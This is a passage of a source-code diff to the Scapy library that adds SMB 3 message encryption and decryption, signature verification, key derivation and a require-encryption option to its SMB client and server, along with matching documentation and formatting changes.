SMB1. -.. warning:: Encryption is currently not supported in neither the client nor server. - .. _client: SMB 2/3 client @@ -94,6 +92,12 @@ You might be wondering if you can pass the ``HashNT`` of the password of the use If you pay very close attention, you'll notice that in this case we aren't using the :class:`~scapy.layers.spnego.SPNEGOSSP` wrapper. You could have used ``ssp=SPNEGOSSP([t.ssp(1)])``. +**smbclient forcing encryption**: + +.. code:: python + + >>> smbclient("server1.domain.local", "admin", REQUIRE_ENCRYPTION=True) + .. note:: It is also possible to start the :class:`~scapy.layers.smbclient.smbclient` directly from the OS, using the following:: @@ -306,6 +310,15 @@ A share is identified by a ``name`` and a ``path`` (+ an optional description ca readonly=False, ) +**Start a SMB server requiring encryption (two methods)**: + +.. code:: python + + # Method 1: require encryption globally (available in SMB 3.0.0+) + >>> smbserver(..., REQUIRE_ENCRYPTION=True) + # Method 2: for a specific share (only available in SMB 3.1.1+) + >>> smbserver(..., shares=[SMBShare(name="Scapy", path="/tmp", encryptdata=True)]) + .. note:: It is possible to start the :class:`~scapy.layers.smbserver.smbserver` (albeit only in unauthenticated mode) directly from the OS, using the following:: diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index a32792dbeaf..a6e14a84fcc 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -798,7 +798,12 @@ Available by default: - HTTP 1.0 - TLS - Kerberos + - LDAP + - SMB - DCE/RPC + - Postgres + - DOIP + - and maybe other protocols if this page isn't up to date. - :py:class:`~scapy.sessions.TLSSession` -> *matches TLS sessions* on the flow. - :py:class:`~scapy.sessions.NetflowSession` -> *resolve Netflow V9 packets* from their NetflowFlowset information objects diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index efabef3cc8d..301026383e0 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1680,9 +1680,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): EncryptedRandomSessionKey = b"\x00" * 16 else: EncryptedRandomSessionKey = auth_tok.EncryptedRandomSessionKey - ExportedSessionKey = RC4K( - KeyExchangeKey, EncryptedRandomSessionKey - ) + ExportedSessionKey = RC4K(KeyExchangeKey, EncryptedRandomSessionKey) else: ExportedSessionKey = KeyExchangeKey Context.ExportedSessionKey = ExportedSessionKey @@ -1800,6 +1798,7 @@ def _getSessionBaseKey(self, Context, auth_tok): return NTLMv2_ComputeSessionBaseKey( ResponseKeyNT, auth_tok.NtChallengeResponse.NTProofStr ) + log_runtime.debug("NTLMSSP: Bad credentials for %s" % username) return None def _checkLogin(self, Context, auth_tok): diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index c81451241a2..676021e1d6b 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -67,7 +67,9 @@ ) from scapy.layers.smb2 import ( STATUS_ERREF, + SMB2_Compression_Transform_Header, SMB2_Header, + SMB2_Transform_Header, ) @@ -919,11 +921,9 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): elif _pkt[0] == 0x13: # LOGON_SAM_USER_RESPONSE try: i = _pkt.index(b"\xff\xff\xff\xff") - NtVersion = ( - NETLOGON_SAM_LOGON_RESPONSE_NT40.fields_desc[-3].getfield( - None, _pkt[i - 4:i] - )[1] - ) + NtVersion = NETLOGON_SAM_LOGON_RESPONSE_NT40.fields_desc[ + -3 + ].getfield(None, _pkt[i - 4 : i])[1] if NtVersion.V1 and not NtVersion.V5: return NETLOGON_SAM_LOGON_RESPONSE_NT40 except Exception: @@ -1013,6 +1013,7 @@ class NETLOGON_SAM_LOGON_RESPONSE_NT40(NETLOGON): # [MS-ADTS] sect 6.3.1.8 + class NETLOGON_SAM_LOGON_RESPONSE(NETLOGON, DNSCompressedPacket): fields_desc = [ LEShortEnumField("OpCode", 0x17, _NETLOGON_opcodes), @@ -1085,8 +1086,7 @@ def pre_dissect(self, s): try: i = s.index(b"\xff\xff\xff\xff") self.fields["NtVersion"] = self.fields_desc[-3].getfield( - self, - s[i - 4:i] + self, s[i - 4 : i] )[1] except Exception: self.NtVersion = 0xB @@ -1098,20 +1098,25 @@ def get_full(self): # [MS-BRWS] sect 2.2 + class BRWS(Packet): fields_desc = [ - ByteEnumField("OpCode", 0x00, { - 0x01: "HostAnnouncement", - 0x02: "AnnouncementRequest", - 0x08: "RequestElection", - 0x09: "GetBackupListRequest", - 0x0A: "GetBackupListResponse", - 0x0B: "BecomeBackup", - 0x0C: "DomainAnnouncement", - 0x0D: "MasterAnnouncement", - 0x0E: "ResetStateRequest", - 0x0F: "LocalMasterAnnouncement", - }), + ByteEnumField( + "OpCode", + 0x00, + { + 0x01: "HostAnnouncement", + 0x02: "AnnouncementRequest", + 0x08: "RequestElection", + 0x09: "GetBackupListRequest", + 0x0A: "GetBackupListResponse", + 0x0B: "BecomeBackup", + 0x0C: "DomainAnnouncement", + 0x0D: "MasterAnnouncement", + 0x0E: "ResetStateRequest", + 0x0F: "LocalMasterAnnouncement", + }, + ), ] def mysummary(self): @@ -1135,6 +1140,7 @@ def default_payload_class(self, payload): # [MS-BRWS] sect 2.2.1 + class BRWS_HostAnnouncement(BRWS): OpCode = 0x01 fields_desc = [ @@ -1157,6 +1163,7 @@ def mysummary(self): # [MS-BRWS] sect 2.2.6 + class BRWS_BecomeBackup(BRWS): OpCode = 0x0B fields_desc = [ @@ -1170,6 +1177,7 @@ def mysummary(self): # [MS-BRWS] sect 2.2.10 + class BRWS_LocalMasterAnnouncement(BRWS_HostAnnouncement): OpCode = 0x0F @@ -1193,6 +1201,10 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return SMB_Header if _pkt[:4] == b"\xfeSMB": return SMB2_Header + if _pkt[:4] == b"\xfdSMB": + return SMB2_Transform_Header + if _pkt[:4] == b"\xfcSMB": + return SMB2_Compression_Transform_Header return cls diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index f154ca5be9c..b545a421cff 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -268,6 +268,11 @@ 0x0002: "AES-GMAC", } +# [MS-SMB2] sect 2.2.3.1.1 +SMB2_HASH_ALGORITHMS = { + 0x0001: "SHA-512", +} + # sect [MS-SMB2] 2.2.13.1.1 SMB2_ACCESS_FLAGS_FILE = { 0x00000001: "FILE_READ_DATA", @@ -809,9 +814,11 @@ def summary(self): return "S-%s-%s%s" % ( self.Revision, struct.unpack(">Q", b"\x00\x00" + self.IdentifierAuthority.Value)[0], - ("-%s" % "-".join(str(x) for x in self.SubAuthority)) - if self.SubAuthority - else "", + ( + ("-%s" % "-".join(str(x) for x in self.SubAuthority)) + if self.SubAuthority + else "" + ), ) @@ -1740,6 +1747,8 @@ class DirectTCP(NBTSession): class SMB2_Header(Packet): + __slots__ = ["_decrypted"] + name = "SMB2 Header" fields_desc = [ StrFixedLenField("Start", b"\xfeSMB", 4), @@ -1791,6 +1800,11 @@ class SMB2_Header(Packet): (0x0000010C, 0x000F), # STATUS_NOTIFY_ENUM_DIR ) + def __init__(self, *args, **kwargs): + # The parent passes whether this packet was decrypted or not. + self._decrypted = kwargs.pop("_decrypted", False) + super(SMB2_Header, self).__init__(*args, **kwargs) + def guess_payload_class(self, payload): if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR and self.Status != 0x00000000: # Check status for responses @@ -1860,17 +1874,22 @@ def guess_payload_class(self, payload): return SMB2_IOCTL_Request return super(SMB2_Header, self).guess_payload_class(payload) - def sign(self, dialect, SigningSessionKey, SigningAlgorithmId=None, IsClient=None): - # [MS-SMB2] 3.1.4.1 - self.SecuritySignature = b"\x00" * 16 - s = bytes(self) + def _calc_signature( + self, s, dialect, SigningSessionKey, SigningAlgorithmId=None, IsClient=None + ): + """ + This function calculates the signature of a SMB2 packet. + Detail is from [MS-SMB2] 3.1.4.1 + """ if len(s) <= 64: log_runtime.warning("Cannot sign invalid SMB packet !") return s if dialect in [0x0300, 0x0302, 0x0311]: # SMB 3 if dialect == 0x0311: # SMB 3.1.1 - if SigningAlgorithmId is None or IsClient is None: - raise Exception("SMB 3.1.1 needs a SigningAlgorithmId and IsClient") + if IsClient is None: + raise Exception("SMB 3.1.1 needs a IsClient") + if SigningAlgorithmId is None: + SigningAlgorithmId = "AES-CMAC" # AES-128-CMAC else: SigningAlgorithmId = "AES-CMAC" # AES-128-CMAC if "GMAC" in SigningAlgorithmId: @@ -1903,11 +1922,88 @@ def sign(self, dialect, SigningSessionKey, SigningAlgorithmId=None, IsClient=Non sig = sig[:16] else: log_runtime.warning("Unknown SMB Version %s ! Cannot sign." % dialect) - sig = s[:-16] + b"\x00" * 16 - self.SecuritySignature = sig + sig = b"\x00" * 16 + return sig + + def sign(self, dialect, SigningSessionKey, SigningAlgorithmId=None, IsClient=None): + """ + [MS-SMB2] 3.1.4.1 - Signing An Outgoing Message + """ + # Set the current signature to nul + self.SecuritySignature = b"\x00" * 16 + # Calculate the signature + s = bytes(self) + self.SecuritySignature = self._calc_signature( + s, + dialect=dialect, + SigningSessionKey=SigningSessionKey, + SigningAlgorithmId=SigningAlgorithmId, + IsClient=IsClient, + ) # we make sure the payload is static self.payload = conf.raw_layer(load=s[64:]) + def verify( + self, dialect, SigningSessionKey, SigningAlgorithmId=None, IsClient=None + ): + """ + [MS-SMB2] sect 3.2.5.1.3 - Verifying the signature + """ + s = bytes(self) + # Set SecuritySignature to nul + s = s[:48] + b"\x00" * 16 + s[64:] + # Calculate the signature + sig = self._calc_signature( + s, + dialect=dialect, + SigningSessionKey=SigningSessionKey, + SigningAlgorithmId=SigningAlgorithmId, + IsClient=IsClient, + ) + if self.SecuritySignature != sig: + log_runtime.error("SMB signature is invalid !") + raise Exception("ERROR: SMB signature is invalid !") + + def encrypt(self, dialect, EncryptionKey, CipherId): + """ + [MS-SMB2] sect 3.1.4.3 - Encrypting the Message + """ + if dialect < 0x0300: + raise Exception("Encryption is not supported on this SMB dialect !") + elif dialect < 0x0311 and CipherId != "AES-128-CCM": + raise Exception("CipherId is not supported on this SMB dialect !") + + data = bytes(self) + smbt = SMB2_Transform_Header( + OriginalMessageSize=len(self), + SessionId=self.SessionId, + Flags=0x0001, + ) + if "GCM" in CipherId: + from cryptography.hazmat.primitives.ciphers.aead import AESGCM + + nonce = os.urandom(12) + cipher = AESGCM(EncryptionKey) + elif "CCM" in CipherId: + from cryptography.hazmat.primitives.ciphers.aead import AESCCM + + nonce = os.urandom(11) + cipher = AESCCM(EncryptionKey) + else: + raise Exception("Unknown CipherId !") + + # Add nonce to header and build the auth data + smbt.Nonce = nonce + aad = bytes(smbt)[20:] + + # Perform the actual encryption + data = cipher.encrypt(nonce, data, aad) + + # Put the auth tag in the Signature field + smbt.Signature, data = data[-16:], data[:-16] + + return smbt / data + class _SMB2_Payload(Packet): def do_dissect_payload(self, s): @@ -2139,10 +2235,7 @@ class SMB2_Preauth_Integrity_Capabilities(Packet): LEShortEnumField( "", 0x0, - { - # As for today, no other hash algorithm is described by the spec - 0x0001: "SHA-512", - }, + SMB2_HASH_ALGORITHMS, ), count_from=lambda pkt: pkt.HashAlgorithmCount, ), @@ -2224,7 +2317,11 @@ def default_payload_class(self, payload): class SMB2_Netname_Negotiate_Context_ID(Packet): name = "SMB2 Netname Negotiate Context ID" - fields_desc = [StrFieldUtf16("NetName", "")] + fields_desc = [ + StrLenFieldUtf16( + "NetName", "", length_from=lambda pkt: pkt.underlayer.DataLength + ) + ] def default_payload_class(self, payload): return conf.padding_layer @@ -2477,7 +2574,7 @@ class SMB2_Session_Setup_Response(_SMB2_Payload, _NTLMPayloadPacket): { 0x0001: "IS_GUEST", 0x0002: "IS_NULL", - 0x0004: "ENCRYPT_DATE", + 0x0004: "ENCRYPT_DATA", }, ), XLEShortField("SecurityBufferOffset", None), @@ -2896,11 +2993,15 @@ class SMB2_Create_Context(_NTLMPayloadPacket): "pad", b"", length_from=lambda x: ( - x.Next - - max(x.DataBufferOffset + x.DataLen, x.NameBufferOffset + x.NameLen) - ) - if x.Next - else 0, + ( + x.Next + - max( + x.DataBufferOffset + x.DataLen, x.NameBufferOffset + x.NameLen + ) + ) + if x.Next + else 0 + ), ), ] @@ -4252,6 +4353,60 @@ class SMB2_Set_Info_Response(_SMB2_Payload): ) +# sect 2.2.41 + + +class SMB2_Transform_Header(Packet): + name = "SMB2 Transform Header" + fields_desc = [ + StrFixedLenField("Start", b"\xfdSMB", 4), + XStrFixedLenField("Signature", 0, length=16), + XStrFixedLenField("Nonce", b"", length=16), + LEIntField("OriginalMessageSize", 0x0), + LEShortField("Reserved", 0), + LEShortEnumField( + "Flags", + 0x1, + { + 0x0001: "ENCRYPTED", + }, + ), + LELongField("SessionId", 0), + ] + + def decrypt(self, dialect, DecryptionKey, CipherId): + """ + [MS-SMB2] sect 3.2.5.1.1.1 - Decrypting the Message + """ + if not isinstance(self.payload, conf.raw_layer): + raise Exception("No payload to decrypt !") + + if "GCM" in CipherId: + from cryptography.hazmat.primitives.ciphers.aead import AESGCM + + nonce = self.Nonce[:12] + cipher = AESGCM(DecryptionKey) + elif "CCM" in CipherId: + from cryptography.hazmat.primitives.ciphers.aead import AESCCM + + nonce = self.Nonce[:11] + cipher = AESCCM(DecryptionKey) + else: + raise Exception("Unknown CipherId !") + + # Decrypt the data + aad = self.self_build()[20:] + data = cipher.decrypt( + nonce, + self.payload.load + self.Signature, + aad, + ) + return SMB2_Header(data, _decrypted=True) + + +bind_layers(SMB2_Transform_Header, conf.raw_layer) + + # sect 2.2.42.1 @@ -4525,9 +4680,17 @@ def recv(self, x=None): # note: normal StreamSocket takes care of NBTSession / DirectTCP fragments. # this takes care of splitting compounded requests if self.queue: - return self.queue.popleft() - pkt = super(SMBStreamSocket, self).recv(x) - if pkt is not None and SMB2_Header in pkt: + pkt = self.queue.popleft() + else: + pkt = super(SMBStreamSocket, self).recv(x) + # If there are multiple SMB2_Header requests (aka. compounded), + # take the first and store the rest in a queue. + if pkt is not None and ( + SMB2_Header in pkt + or SMB2_Transform_Header in pkt + or SMB2_Compression_Transform_Header in pkt + ): + pkt = self.session.in_pkt(pkt) pay = pkt[SMB2_Header].payload while SMB2_Header in pay: pay = pay[SMB2_Header] @@ -4536,10 +4699,29 @@ def recv(self, x=None): if not pay.NextCommand: break pay = pay.payload - return self.session.in_pkt(pkt) + # Verify the signature if required. + # This happens here because we must have split compounded requests first. + smbh = pkt.getlayer(SMB2_Header) + if ( + smbh + and self.session.Dialect + and self.session.SigningKey + and self.session.SigningRequired + and not smbh._decrypted + ): + smbh.verify( + self.session.Dialect, + self.session.SigningKey, + # SMB 3.1.1 parameters: + SigningAlgorithmId=self.session.SigningAlgorithmId, + IsClient=False, + ) + return pkt - def send(self, x, Compounded=False, **kwargs): - for pkt in self.session.out_pkt(x, Compounded=Compounded): + def send(self, x, Compounded=False, ForceSign=False, ForceEncrypt=False, **kwargs): + for pkt in self.session.out_pkt( + x, Compounded=Compounded, ForceSign=ForceSign, ForceEncrypt=ForceEncrypt + ): return super(SMBStreamSocket, self).send(pkt, **kwargs) @staticmethod @@ -4563,12 +4745,28 @@ def __init__(self, *args, **kwargs): self.CompoundQueue = [] self.Dialect = 0x0202 # Updated by parent self.Credits = 0 - self.SecurityMode = 0 - # Crypto parameters - self.SMBSessionKey = None + self.IsGuest = False + # Crypto parameters. Go read [MS-SMB2] to understand the names. + self.SigningRequired = True + self.SupportsEncryption = False + self.EncryptData = False + self.TreeEncryptData = False + self.SigningKey = None + self.EncryptionKey = None + self.DecryptionKey = None self.PreauthIntegrityHashId = "SHA-512" + self.SupportedCipherIds = [ + "AES-128-CCM", + "AES-128-GCM", + "AES-256-CCM", + "AES-256-GCM", + ] self.CipherId = "AES-128-CCM" - self.SigningAlgorithmId = "AES-CMAC" + self.SupportedSigningAlgorithmIds = [ + "AES-CMAC", + "HMAC-SHA256", + ] + self.SigningAlgorithmId = None self.Salt = os.urandom(32) self.ConnectionPreauthIntegrityHashValue = None self.SessionPreauthIntegrityHashValue = None @@ -4582,18 +4780,22 @@ def __init__(self, *args, **kwargs): # SMB crypto functions @crypto_validator - def computeSMBSessionKey(self): + def computeSMBSessionKeys(self, IsClient=None): + """ + Compute the SigningKey and EncryptionKey (for SMB 3+) + """ if not getattr(self.sspcontext, "SessionKey", None): # no signing key, no session key return # [MS-SMB2] sect 3.3.5.5.3 + # SigningKey if self.Dialect >= 0x0300: if self.Dialect == 0x0311: label = b"SMBSigningKey\x00" - preauth_hash = self.SessionPreauthIntegrityHashValue + context = self.SessionPreauthIntegrityHashValue else: label = b"SMB2AESCMAC\x00" - preauth_hash = b"SmbSign\x00" + context = b"SmbSign\x00" # [MS-SMB2] sect 3.1.4.2 if "256" in self.CipherId: L = 256 @@ -4601,14 +4803,43 @@ def computeSMBSessionKey(self): L = 128 else: raise ValueError - self.SMBSessionKey = SP800108_KDFCTR( + self.SigningKey = SP800108_KDFCTR( self.sspcontext.SessionKey[:16], - label, # label - preauth_hash, # context + label, + context, + L, + ) + # EncryptionKey / DecryptionKey + if self.Dialect == 0x0311: + if IsClient: + label_out = b"SMBC2SCipherKey\x00" + label_in = b"SMBS2CCipherKey\x00" + else: + label_out = b"SMBS2CCipherKey\x00" + label_in = b"SMBC2SCipherKey\x00" + context_out = context_in = self.SessionPreauthIntegrityHashValue + else: + label_out = label_in = b"SMB2AESCCM\x00" + if IsClient: + context_out = b"ServerIn \x00" # extra space per spec + context_in = b"ServerOut\x00" + else: + context_out = b"ServerOut\x00" + context_in = b"ServerIn \x00" + self.EncryptionKey = SP800108_KDFCTR( + self.sspcontext.SessionKey[: L // 8], + label_out, + context_out, + L, + ) + self.DecryptionKey = SP800108_KDFCTR( + self.sspcontext.SessionKey[: L // 8], + label_in, + context_in, L, ) elif self.Dialect <= 0x0210: - self.SMBSessionKey = self.sspcontext.SessionKey[:16] + self.SigningKey = self.sspcontext.SessionKey[:16] else: raise ValueError("Hmmm ? >:(") @@ -4653,19 +4884,29 @@ def in_pkt(self, pkt): """ Incoming SMB packet """ + if SMB2_Transform_Header in pkt: + # Packet is encrypted + pkt = pkt[SMB2_Transform_Header].decrypt( + self.Dialect, + self.DecryptionKey, + CipherId=self.CipherId, + ) + # Signature is verified in SMBStreamSocket return pkt - def out_pkt(self, pkt, Compounded=False): + def out_pkt(self, pkt, Compounded=False, ForceSign=False, ForceEncrypt=False): """ Outgoing SMB packet :param pkt: the packet to send :param Compound: if True, will be stack to be send with the next un-compounded packet + :param ForceSign: if True, force to sign the packet. + :param ForceEncrypt: if True, force to encrypt the packet. Handles: - handle compounded requests (if any): [MS-SMB2] 3.3.5.2.7 - - handles signing (if required) + - handles signing and encryption (if required) """ # Note: impacket and wireshark get crazy on compounded+signature, but # windows+samba tells we're right :D @@ -4687,13 +4928,17 @@ def out_pkt(self, pkt, Compounded=False): if padlen: pkt.add_payload(b"\x00" * padlen) pkt[SMB2_Header].NextCommand = length + padlen - if self.Dialect and self.SMBSessionKey and self.SecurityMode != 0: - # Sign SMB2 ! + if ( + self.Dialect + and self.SigningKey + and (ForceSign or self.SigningRequired and not ForceEncrypt) + ): + # [MS-SMB2] sect 3.2.4.1.1 - Signing smb = pkt[SMB2_Header] smb.Flags += "SMB2_FLAGS_SIGNED" smb.sign( self.Dialect, - self.SMBSessionKey, + self.SigningKey, # SMB 3.1.1 parameters: SigningAlgorithmId=self.SigningAlgorithmId, IsClient=False, @@ -4707,6 +4952,22 @@ def out_pkt(self, pkt, Compounded=False): if self.CompoundQueue: pkt = functools.reduce(lambda x, y: x / y, self.CompoundQueue) / pkt self.CompoundQueue.clear() + if self.EncryptionKey and ( + ForceEncrypt or self.EncryptData or self.TreeEncryptData + ): + # [MS-SMB2] sect 3.1.4.3 - Encrypting the message + smb = pkt[SMB2_Header] + assert not smb.Flags.SMB2_FLAGS_SIGNED + smbt = smb.encrypt( + self.Dialect, + self.EncryptionKey, + CipherId=self.CipherId, + ) + if smb.underlayer: + # If there's an underlayer, replace current SMB header + smb.underlayer.payload = smbt + else: + smb = smbt return [pkt] def process(self, pkt: Packet): diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 27d0b06d463..e31e1a47f01 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -83,8 +83,8 @@ SMB2_CREATE_REQUEST_LEASE, SMB2_Create_Request, SMB2_Create_Response, - SMB2_Encryption_Capabilities, SMB2_ENCRYPTION_CIPHERS, + SMB2_Encryption_Capabilities, SMB2_Error_Response, SMB2_Header, SMB2_IOCTL_Request, @@ -100,9 +100,9 @@ SMB2_Query_Info_Response, SMB2_Read_Request, SMB2_Read_Response, + SMB2_SIGNING_ALGORITHMS, SMB2_Session_Setup_Request, SMB2_Session_Setup_Response, - SMB2_SIGNING_ALGORITHMS, SMB2_Signing_Capabilities, SMB2_Tree_Connect_Request, SMB2_Tree_Connect_Response, @@ -127,6 +127,7 @@ class SMB_Client(Automaton): All other options (in caps) are optional, and SMB specific: :param REQUIRE_SIGNATURE: set 'Require Signature' + :param REQUIRE_ENCRYPTION: set 'Requite Encryption' :param MIN_DIALECT: minimum SMB dialect. Defaults to 0x0202 (2.0.2) :param MAX_DIALECT: maximum SMB dialect. Defaults to 0x0311 (3.1.1) :param DIALECTS: list of supported SMB2 dialects. @@ -140,7 +141,8 @@ def __init__(self, sock, ssp=None, *args, **kwargs): # Various SMB client arguments self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) self.USE_SMB1 = kwargs.pop("USE_SMB1", False) - self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", False) + self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", None) + self.REQUIRE_ENCRYPTION = kwargs.pop("REQUIRE_ENCRYPTION", False) self.RETRY = kwargs.pop("RETRY", 0) # optionally: retry n times session setup self.SMB2 = kwargs.pop("SMB2", False) # optionally: start directly in SMB2 self.SERVER_NAME = kwargs.pop("SERVER_NAME", "") @@ -158,7 +160,6 @@ def __init__(self, sock, ssp=None, *args, **kwargs): ] ) # Internal Session information - self.IsGuest = False self.ErrorStatus = None self.NegotiateCapabilities = None self.GUID = RandUUID()._fix() @@ -187,9 +188,8 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.smb_sock_ready = threading.Event() # Set session options self.session.ssp = ssp - self.session.SecurityMode = kwargs.pop( - "SECURITY_MODE", - 3 if self.REQUIRE_SIGNATURE else int(bool(ssp)), + self.session.SigningRequired = ( + self.REQUIRE_SIGNATURE if self.REQUIRE_SIGNATURE is not None else bool(ssp) ) self.session.Dialect = self.MAX_DIALECT @@ -319,7 +319,11 @@ def on_negotiate_smb2(self): # [MS-SMB2] sect 3.2.4.2.2.2 - SMB2-Only Negotiate pkt = self.smb_header.copy() / SMB2_Negotiate_Protocol_Request( Dialects=self.DIALECTS, - SecurityMode=self.session.SecurityMode, + SecurityMode=( + "SIGNING_ENABLED+SIGNING_REQUIRED" + if self.session.SigningRequired + else "SIGNING_ENABLED" + ), ) if self.MAX_DIALECT >= 0x0210: # "If the client implements the SMB 2.1 or SMB 3.x dialect, ClientGuid @@ -340,25 +344,21 @@ def on_negotiate_smb2(self): "MULTI_CHANNEL", "PERSISTENT_HANDLES", "DIRECTORY_LEASING", + "ENCRYPTION", ] ) - if self.MAX_DIALECT >= 0x0300: - # "If the client implements the SMB 3.x dialect family, the client MUST - # set the Capabilities field as follows" - self.NegotiateCapabilities += "+ENCRYPTION" if self.MAX_DIALECT >= 0x0311: # "If the client implements the SMB 3.1.1 dialect, it MUST do" pkt.NegotiateContexts = [ SMB2_Negotiate_Context() / SMB2_Preauth_Integrity_Capabilities( - # SHA-512 by default - HashAlgorithms=[self.session.PreauthIntegrityHashId], + # As for today, no other hash algorithm is described by the spec + HashAlgorithms=["SHA-512"], Salt=self.session.Salt, ), SMB2_Negotiate_Context() / SMB2_Encryption_Capabilities( - # AES-128-CCM by default - Ciphers=[self.session.CipherId], + Ciphers=self.session.SupportedCipherIds, ), # TODO support compression and RDMA SMB2_Negotiate_Context() @@ -367,8 +367,7 @@ def on_negotiate_smb2(self): ), SMB2_Negotiate_Context() / SMB2_Signing_Capabilities( - # AES-128-CCM by default - SigningAlgorithms=[self.session.SigningAlgorithmId], + SigningAlgorithms=self.session.SupportedSigningAlgorithmIds, ), ] pkt.Capabilities = self.NegotiateCapabilities @@ -416,19 +415,30 @@ def receive_negotiate_response(self, pkt): self.MaxReadSize = pkt.MaxReadSize self.MaxTransactionSize = pkt.MaxTransactionSize self.MaxWriteSize = pkt.MaxWriteSize + # Process SecurityMode + if pkt.SecurityMode.SIGNING_REQUIRED: + self.session.SigningRequired = True + # Process capabilities + if self.session.Dialect >= 0x0300: + self.session.SupportsEncryption = pkt.Capabilities.ENCRYPTION # Process NegotiateContext if self.session.Dialect >= 0x0311 and pkt.NegotiateContextsCount: for ngctx in pkt.NegotiateContexts: if ngctx.ContextType == 0x0002: # SMB2_ENCRYPTION_CAPABILITIES - self.session.CipherId = SMB2_ENCRYPTION_CIPHERS[ - ngctx.Ciphers[0] - ] + if ngctx.Ciphers[0] != 0: + self.session.CipherId = SMB2_ENCRYPTION_CIPHERS[ + ngctx.Ciphers[0] + ] + self.session.SupportsEncryption = True elif ngctx.ContextType == 0x0008: # SMB2_SIGNING_CAPABILITIES self.session.SigningAlgorithmId = ( SMB2_SIGNING_ALGORITHMS[ngctx.SigningAlgorithms[0]] ) + if self.REQUIRE_ENCRYPTION and not self.session.SupportsEncryption: + self.ErrorStatus = "NEGOTIATE FAILURE: encryption." + raise self.NEGO_FAILED() self.update_smbheader(pkt) raise self.NEGOTIATED(ssp_blob) elif SMBNegotiate_Response_Security in pkt: @@ -436,6 +446,10 @@ def receive_negotiate_response(self, pkt): # Never tested. FIXME. probably broken raise self.NEGOTIATED(pkt.Challenge) + @ATMT.state(final=1) + def NEGO_FAILED(self): + self.smb_sock_ready.set() + @ATMT.state() def NEGOTIATED(self, ssp_blob=None): # Negotiated ! We now know the Dialect @@ -448,11 +462,7 @@ def NEGOTIATED(self, ssp_blob=None): ssp_blob, req_flags=( GSS_C_FLAGS.GSS_C_MUTUAL_FLAG - | ( - GSS_C_FLAGS.GSS_C_INTEG_FLAG - if self.session.SecurityMode != 0 - else 0 - ) + | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.session.SigningRequired else 0) ), ) return ssp_tuple @@ -498,7 +508,11 @@ def send_setup_andx_request(self, ssp_tuple): # SMB2 pkt = self.smb_header.copy() / SMB2_Session_Setup_Request( Capabilities="DFS", - SecurityMode=self.session.SecurityMode, + SecurityMode=( + "SIGNING_ENABLED+SIGNING_REQUIRED" + if self.session.SigningRequired + else "SIGNING_ENABLED" + ), ) else: # SMB1 extended @@ -562,9 +576,18 @@ def receive_setup_andx_response(self, pkt): self.smb_header.SessionId = pkt.SessionId # SMB1 extended / SMB2 if pkt.Status == 0: # Authenticated - if SMB2_Session_Setup_Response in pkt and pkt.SessionFlags.IS_GUEST: - # We were 'authenticated' in GUEST - self.IsGuest = True + if SMB2_Session_Setup_Response in pkt: + # [MS-SMB2] sect 3.2.5.3.1 + if pkt.SessionFlags.IS_GUEST: + # "If the security subsystem indicates that the session + # was established by a guest user, Session.SigningRequired + # MUST be set to FALSE and Session.IsGuest MUST be set to TRUE." + self.session.IsGuest = True + self.session.SigningRequired = False + elif self.session.Dialect >= 0x0300: + if pkt.SessionFlags.ENCRYPT_DATA or self.REQUIRE_ENCRYPTION: + self.session.EncryptData = True + self.session.SigningRequired = False raise self.AUTHENTICATED(pkt.SecurityBlob) else: if SMB2_Header in pkt: @@ -600,10 +623,7 @@ def AUTHENTICATED(self, ssp_blob=None): if status != GSS_S_COMPLETE: raise ValueError("Internal error: the SSP completed with an error.") # Authentication was successful - self.session.computeSMBSessionKey() - if self.IsGuest: - # When authenticated in Guest, the sessionkey the client has is invalid - self.session.SMBSessionKey = None + self.session.computeSMBSessionKeys(IsClient=True) # DEV: add a condition on AUTHENTICATED with prio=0 @@ -663,7 +683,9 @@ def __init__(self, smbsock, use_ioctl=True, timeout=3): self.ins = smbsock self.timeout = timeout if not self.ins.atmt.smb_sock_ready.wait(timeout=timeout): - self.ins.atmt.session.sspcontext.clifailure() + # If we have a SSP, tell it we failed. + if self.ins.atmt.session.sspcontext: + self.ins.atmt.session.sspcontext.clifailure() raise TimeoutError( "The SMB handshake timed out ! (enable debug=1 for logs)" ) @@ -725,6 +747,12 @@ def tree_connect(self, name): raise ValueError("TreeConnect timed out !") if SMB2_Tree_Connect_Response not in resp: raise ValueError("Failed TreeConnect ! %s" % resp.NTStatus) + # [MS-SMB2] sect 3.2.5.5 + if self.session.Dialect >= 0x0300: + if resp.ShareFlags.ENCRYPT_DATA and self.session.SupportsEncryption: + self.session.TreeEncryptData = True + else: + self.session.TreeEncryptData = False return self.get_TID() def tree_disconnect(self): @@ -1078,6 +1106,11 @@ class smbclient(CLIUtil): :param ST: if provided, the service ticket to use (Kerberos) :param KEY: if provided, the session key associated to the ticket (Kerberos) :param cli: CLI mode (default True). False to use for scripting + + Some additional SMB parameters are available under help(SMB_Client). Some of + them include the following: + + :param REQUIRE_ENCRYPTION: requires encryption. """ def __init__( @@ -1097,6 +1130,7 @@ def __init__( KEY=None, cli=True, # SMB arguments + REQUIRE_ENCRYPTION=False, **kwargs, ): if cli: @@ -1187,6 +1221,7 @@ def __init__( sock, ssp=ssp, debug=debug, + REQUIRE_ENCRYPTION=REQUIRE_ENCRYPTION, **kwargs, ) try: @@ -1229,7 +1264,7 @@ def __init__( "SMB %s" % self.smbsock.session.Dialect, ), repr(self.smbsock.session.sspcontext), - " as GUEST" if self.sock.atmt.IsGuest else "", + " as GUEST" if self.smbsock.session.IsGuest else "", ) ) # Now define some variables for our CLI diff 